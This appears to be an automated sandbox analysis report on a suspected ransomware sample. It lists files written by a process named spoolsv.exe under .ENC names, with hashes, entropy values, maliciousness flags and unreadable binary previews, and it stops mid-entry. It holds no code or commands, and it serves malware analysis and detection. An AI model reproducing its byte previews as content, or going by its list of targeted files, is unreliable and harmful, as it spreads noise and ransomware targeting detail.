                                                                                                                                                                                                                                                      Preview:....K.. ..|*..h..DU...HOu:..-*.....'....^..}Y.#.S..}.M.q...UB.n.r4............0......D...R.l...V..0....&..af...6cv.1.t.....>PX0.l...%../..a.*m..|z........UB.,..<._...p.8._.L.-S4..Hf..,.Z....).....R.."..D.Q...X.d....`..2|..`g..T.T......V..Nct.(..+1c.D#A....S.<b>....K.....B.,+1a....4..M..k.2.....$h...M.n^Jt.QDK..`.L.....!....K..<=xm.P.f.(O.&.=.....w..0k".#W|.E....o....*.=..7.r.xy.r...n. ...r.7043...g......t{..h1k...U.....]....n..... .".cF.......0...F.g'g...?&...0}...X.A]..3.`..S5...\..JutZS)....7'.9..0%R..z....d.M".%-t.b...._._.u.....X..a...].....R.2..D./%..-...f.}*B......J...?....w..e#.O.{.:~.......u.+.......(..J...X&.{...r..(l.r.p=!.:.C.4..4;.ne..x..q..K..j.`..T..d.c.*K..X....}....W.....y.&.q/....O...........f..+..<.b...5`.a(sh..a.W.w..to...H.-Ha..~.0"H.......h....@...f)!..h..dA@........e....;0....n../.&5.....................h4.:.v)i..D....;..5...G...8......23.]@..A.e9Q.DU...pB.|......r8U4"...<.....b..u.uI]p...;.....I.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\machineTelemetryCache.otc.session.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):3.383447637056413
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:NciiNNM9vQm9ihrDinGLoKxoDl1cL0QKjo:NvkG9n9NGcKxoTs0
                                                                                                                                                                                                                                                      MD5:76301D1A8143167322343485FDC523A5
                                                                                                                                                                                                                                                      SHA1:B8DB1C204181F260668754C42C84D1ED651E34EA
                                                                                                                                                                                                                                                      SHA-256:56C7DC780700C0F6CA72875F9CC9F4D3BD53B3C9C850475E3657423860F0EAA0
                                                                                                                                                                                                                                                      SHA-512:935F008B20DE4695C0D8E5DEDF4827210B3460B28D15D5D7C987D8F0467C26A06CEE0B6AFFB368B866A31C68B14788AC5A6B9371D45EE7A4541F0E895BA965ED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:rS7n2.*..........XS..."...Z...,.=.H.}...Y.e>...;..H&.lv.....:....X...XS..@Wd.e(......e.A...b.P..KeFW....Y...VD[.lo.GtM}.,....3H{H].^......."T.9v#0.Bi...+~."Fz......R.Bt..A... =UW^[..?60........%.?t.....%%..n...|.K%....N.~....}......id.-M..mdZ<x....Oe.....I..J.~.V.W..-/.[|.B.w..... ....MU.C%2.kp@.X{Oi....Dq.Bd*.~u.@[..p...t.Wf..@q: ..4.T..M....)%T.R.0..^...)..S.Bbj.$..e.}....T.M.,.-.!.....u9".{...,Vl....N.q.$..M....N.!...b@HkeQ~..b...4..4.z...V.K.Fn}....%.\...~u.)._...~...:.....Ga.>.l...xq./.Wj...5.lT..3....W.a..&.~........7.{.#,......5..0.G..y<*r./.....c....u..i........Yl.(.X.PTp.d..`8..N......c.....Sr..D.\./A`.......%L....{....\.\Xj3...=.[S..2...h*5%-...+...n..Y..t^.Iz5qV..av..h.5.Q.C.)wt"....B[{....z.S._"5.......9e...c..W.....l?z8.L.#toT.".0..............pe.p.%.t..t....K.P^C.w.O..b.....,......k..C..e..N.....|.o.....s...C.....g.G.<.a..?J.|.Q../...p.f....H. ....y.J.[..b....$n....+.....J..cc....xo.....-....."8b..E..b...M.{D...zBV...%f...nJ..>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\parentTelemetryCache.otc.session.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):3.3827295474205417
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:NciiNNM9vQm9ihrDinGLoKxobaPAbnoz:NvkG9n9NGcKxob2
                                                                                                                                                                                                                                                      MD5:B187243D05D6A514571B05945EE89E69
                                                                                                                                                                                                                                                      SHA1:7BA8EAA30376B607147678CD83D5B5946E0F5B01
                                                                                                                                                                                                                                                      SHA-256:E9D0FB637B8C43D4A35C92100903E830B2383A754E4BC714DFC5921A08953418
                                                                                                                                                                                                                                                      SHA-512:A9CBB103AE9C622B957C1696FA112D48762BF30BDC76A22C1DE299C3258DC32E49744439EAC336E8D873ABC97AF8FDE7D55F3D3C35C9BC02A69ABD616C2F1475
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:rS7n2.*..........XS..."...Z...,.=.H.}...Y.e>...;..H&.lv.....:....X...XS..@Wd.e(......e.A...b.P..KeFW....Y...VD[.lo.GtM}.,....3H{H].^......."T.9v#0.Bi...+~."Fz......R.Bt..A... =UW^[..?60........%.?t.....%%..n...|.K%....N.~....}......id.-M..mdZ<x....Oe.....I..J.~.V.W..-/.[|.B.w..... ....MU.C%2.kp@.X{Oi....Dq.Bd*.~u.@[..p...t.Wf..@q: ..4.T..M....)%T.R.0..^...)..S.Bbj.$..e.}....T.M.,.-.!.....u9".{...,Vl....N.q.$..M....N.!...b@HkeQ~..b...4..4.z...V.K.Fn}....%.\...~u.)._...~...:.....Ga.>.l...xq./.Wj...5.lT..3....W.a..&.~........7.{.#,......5..0.G..y<*r./.....c....u..i........Yl.(.X.PTp.d..`8..N......c.....Sr..D.\./A`.......%L....{....\.\Xj3...=.[S..2...h*5%-...+...n..Y..t^.Iz5qV..av..h.5.Q.C.)wt"....B[{....z.S._"5.......9e...c..W.....l?z8.L.#toT.".0..............pe.p.%.t..t....K.P^C.w.O..b.....,......k..C..e..N.....|.o.....s...C.....g.G.<.a..?J.|.Q../...p.f....H. ....y.J.[..b....$n....+.....J..cc....xo.....-....."8b..E..b...M.{D...zBV...%f...nJ..>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):3.3834223153529135
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:NeXbOXi0iNcEM9viFm9iWcrDtMfnEDvPLvAKGrerUliiOeeiK:NciiNNM9vQm9ihrDinGLoKxo1Def
                                                                                                                                                                                                                                                      MD5:1F61E0FEC4665F3A25E3E1FDE64B10B1
                                                                                                                                                                                                                                                      SHA1:9655D2CC6A39578DC7C1AFD287C234B59645CECC
                                                                                                                                                                                                                                                      SHA-256:4ED2E3A0248B494D9ACF81A81C250115529D902E1EAEC2FE4F4339A5BD1D7DF3
                                                                                                                                                                                                                                                      SHA-512:69C0AED61633179F18E9216544A0EA15A99545064B3274E3D156D6AC2A9432774BA8A9D208DC17489B5050CA7B808DAC76F953502E83DDF42F7AA9F627751928
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:rS7n2.*..........XS..."...Z...,.=.H.}...Y.e>...;..H&.lv.....:....X...XS..@Wd.e(......e.A...b.P..KeFW....Y...VD[.lo.GtM}.,....3H{H].^......."T.9v#0.Bi...+~."Fz......R.Bt..A... =UW^[..?60........%.?t.....%%..n...|.K%....N.~....}......id.-M..mdZ<x....Oe.....I..J.~.V.W..-/.[|.B.w..... ....MU.C%2.kp@.X{Oi....Dq.Bd*.~u.@[..p...t.Wf..@q: ..4.T..M....)%T.R.0..^...)..S.Bbj.$..e.}....T.M.,.-.!.....u9".{...,Vl....N.q.$..M....N.!...b@HkeQ~..b...4..4.z...V.K.Fn}....%.\...~u.)._...~...:.....Ga.>.l...xq./.Wj...5.lT..3....W.a..&.~........7.{.#,......5..0.G..y<*r./.....c....u..i........Yl.(.X.PTp.d..`8..N......c.....Sr..D.\./A`.......%L....{....\.\Xj3...=.[S..2...h*5%-...+...n..Y..t^.Iz5qV..av..h.5.Q.C.)wt"....B[{....z.S._"5.......9e...c..W.....l?z8.L.#toT.".0..............pe.p.%.t..t....K.P^C.w.O..b.....,......k..C..e..N.....|.o.....s...C.....g.G.<.a..?J.|.Q../...p.f....H. ....y.J.[..b....$n....+.....J..cc....xo.....-....."8b..E..b...M.{D...zBV...%f...nJ..>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):448
                                                                                                                                                                                                                                                      Entropy (8bit):7.530082888776873
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:ycDBDjN7qy0xsfcMD4pz9OxfGvPdm+etMADzlzpcvwD9:yYBvN7quj4pZOfGs+a3EvwD9
                                                                                                                                                                                                                                                      MD5:A6B52797DF0AB47CFBB3770F9BFAC3F9
                                                                                                                                                                                                                                                      SHA1:895783507698E70B0F7E39B2134A5114D626E35F
                                                                                                                                                                                                                                                      SHA-256:E56EDCE00AEA9DAE3AE88CCF5141513B5C787CAD51FC6EB56AAAB1FDFCF1F55F
                                                                                                                                                                                                                                                      SHA-512:6F2140D53C2E715B2E5BE1DAB7BF446B79580F9C3E0C626D8F493275BD540473A654FC14023D06D9A8CF683BD0260F8BE9DF29BFB6BDF1443DDC029BDF970B48
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:j..........w..Z.:.m....8...K._.T.4.'.5......-v..s..|=O?.%|.c.&...t..|.^.3`Dk...o.9/.MJe..5>l...H........\..yb..... :b....G-..j......)..!...i.hlw%yp*W[...Fp.PCG.......F.~.G.K.."..(...7....K..U...<..z..NM..,.....9.Z...J..$-..L..L f.....(..k...1~..YE.-........S....@-u...g....L....d...~(z;...t.(\.WL..u.......h...t.r..`.Z.........#..{.x..(............ ..x1..(..;...>8ec..'u.J.<.W.!..>..3.~......D...*QS....z..dx|5.^g....$..%..J....f.z..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\WindowsApps\python.exe.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\WindowsApps\python3.7.exe.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\WindowsApps\python3.exe.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):24592
                                                                                                                                                                                                                                                      Entropy (8bit):7.992089501670513
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:UhJfnGDaGY+jMhlRogHpInOF9/WThE2LpLPWptHiaGL0QmnO4Fd2oqz:9aqMjPHKEcyibL0QwOi29
                                                                                                                                                                                                                                                      MD5:98CEA2B7CC7A5DFCDEB335B919E70404
                                                                                                                                                                                                                                                      SHA1:F60C34437FE718B06B8E6134F94673DEAD063309
                                                                                                                                                                                                                                                      SHA-256:26489896B35B638CA39E421DD68D27B636B8DA3FA0463F23A2931D8705022568
                                                                                                                                                                                                                                                      SHA-512:86F1741AB6706453BC3A086B5E59DE1E1A14224D99A57A76F4C93DD2A48C41FEE3ED4C0FCABD91B6D8CC57C8AA1F8F7A4274D22E88EAA018BFD2B0F8F110D8FF
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:o...E.....jc..."D4........Wf;..6_u..Z?..pT.....0........N...N..m...T..D..G[....N.....f....u..e.....z.^.NE.X....; .T<=3,s.'.g......p6.C......n..X...f=&4..Sf....}5.....k.a..D.A^..O...F..w.=Hy..d...j@.>.W.,...[l..._\.q.....e....e..O.,..7+}...*."....P.k\ce\2...v......@}..0...BC.3b.n@#..Mm.l..{......6`y.....H.9...4....Q...).......H%g..(q..O..5.d.^./..O&5....&d{@.....FFJ......$.P..V,@H.>1......SZL...p.]._}.j...#....R.....sz.P.^...g...,..'...I.a2u...\zTJQ..#.@.+.Nh...3//....D.(.....6g&s\?yIVD|?..f.e.SO.Y.h....'..B..=....I.. ...>.{.$9.l....j6.P.UpZ.%.cT.2....D4j.......O.0.G./Dq..-i..8...v..0.\...0.T.......A.&.1n...x.ns....oY.I7.....E..Ja..J...P...dw..5."sy/.m.....$J..0.lv.j..r6.[XQ..~=IU`.....-.HqE.h.....`..6..z8Y.G...\......."..Xm....J.;#.R}>....7..H....D<K..*....6.[Z.N..unN.)...].UG...l.\.7..x2H^...*"....$.O.s.i....:..$......|i.......3p->.pG.....5...F).`..:....N..A.]G.....|..K.5..?2 .=.o.=.>.M..d.o..k..L...->X.'#.H.P...^3.:&.......v.J

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with CR line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RlqbgZQN7HQn:D+6Y7HQ
                                                                                                                                                                                                                                                      MD5:18E0DA69B26E71C65DA836898DECF55C
                                                                                                                                                                                                                                                      SHA1:8756F7A63163B5B8AE79E3F85E6D773D1E582E99
                                                                                                                                                                                                                                                      SHA-256:43C3D27398652C8398AE6AA6C9AFB139674C31A324AD9E579BC3320E07B810AF
                                                                                                                                                                                                                                                      SHA-512:26EA4E9A5B58166CDB906399C27C465F3EADAA916CC575D25AA6F1B79E0679DFD9A693FB21F2FF1057151ED53525B934727FB65142253061026C4F634AED2C3E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Y.fS..R...OGuh?r.k.V._s30...9Y

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:HsQdaYXD:MuJz
                                                                                                                                                                                                                                                      MD5:2AE74BBD687EE05709510DF067A93BD2
                                                                                                                                                                                                                                                      SHA1:B6DF87F7A26C25CBA4B86431DE0B27A9499F56E5
                                                                                                                                                                                                                                                      SHA-256:275F5E859442FDA1F79B49FF0501B7B74199B4535D607A736BB856A05BFA1D5B
                                                                                                                                                                                                                                                      SHA-512:D16D2B00F443AFFF9C905A66D7FCD9C146133A82ACCD418D58066085BE02E5AA85EB2D508B96C7F4B9D786971802F6DA5A2482CFD87A2EB41DA20DFF924CA020
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:3.^...*:ub.Sk.....x.%..Y#~..}.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.788909765557392
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:EfgYsf7Q9ykn2Ald:ECDQQuJd
                                                                                                                                                                                                                                                      MD5:6C7A2EB04F35195DF241A1D5ED85EADC
                                                                                                                                                                                                                                                      SHA1:DEC4B5733DF44D6E007A2E80D48DBC1204ED2554
                                                                                                                                                                                                                                                      SHA-256:B23019ED3C97E0702F3F5C17F5B07C14C480B83F9D4BEBE83B2F46E3C570B110
                                                                                                                                                                                                                                                      SHA-512:EA729F49FB5EE7539CE0275521DC66A9061180478847082B9BE779A499B5A1CDD276E5F1F3EEA9DA275A7A1EB7226C2BD34ACDA4AEC7B16B1ACE1ABE2AE3076F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.j?x..._..n...!.........vY.2...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:s6/Cl+ZAkL:s6/WmvL
                                                                                                                                                                                                                                                      MD5:99E86FB15F5C62A3878978D788E310D9
                                                                                                                                                                                                                                                      SHA1:86ED6A9671AF1B5EEBC546C457272C73D890CE6C
                                                                                                                                                                                                                                                      SHA-256:B8D826298DE58E7E1B0BE326F521768167F963A146DF8ABB0A6F665B2DD42F2C
                                                                                                                                                                                                                                                      SHA-512:D4844A1A69C72F3F5D29CBBD968787F89485F7F0438B27C5EB1F6E0C90ECF19E8964F4D4F76E3760A8DB96D07E84854A15741CD73D3686C762DFF1D981748396
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:_.......".'Z].d6..8B.....#l..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):5.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:bpIkc5o2:io2
                                                                                                                                                                                                                                                      MD5:700B2873AF76B78725E1FC75D983BDEB
                                                                                                                                                                                                                                                      SHA1:F60BD733FDD5235C6EF2F2C2A84316B3066DDD42
                                                                                                                                                                                                                                                      SHA-256:0C5A7DA33D28B610772FFC598FA319A75B8784BF745E0D0C244569DBE779F8F9
                                                                                                                                                                                                                                                      SHA-512:D06081BEBC0C17C218EA65266EF5EDFA7485409EECC59BCF91955DF35F8E0848F8CE212A7D031E40F163C8E3BE066D43D12D863A2E5830A213151F59585AAD38
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:i^#e..<..7.-...p.z...B.RS.. ..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:5kY0+v7zy71:5kJ+K71
                                                                                                                                                                                                                                                      MD5:C7B996D3EC0FB2D2FEE5C5B875D0D051
                                                                                                                                                                                                                                                      SHA1:B1072E6D94531A98F06AF028CE4D27D0B2472DEE
                                                                                                                                                                                                                                                      SHA-256:E0E75457490C28931E55042C25B82DF4D15730A742F6492ADC2DC489AB79B185
                                                                                                                                                                                                                                                      SHA-512:8EC97D2830D466286667B5BFD77DB5B964C4BE9F9BD80B24CFCD0D847B4AC97B409F342B72D8306B4F5FA4D2BA149636D5B7B1973FA6246A464B698BCF4440A3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:!....=.G.U.`...r........8......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
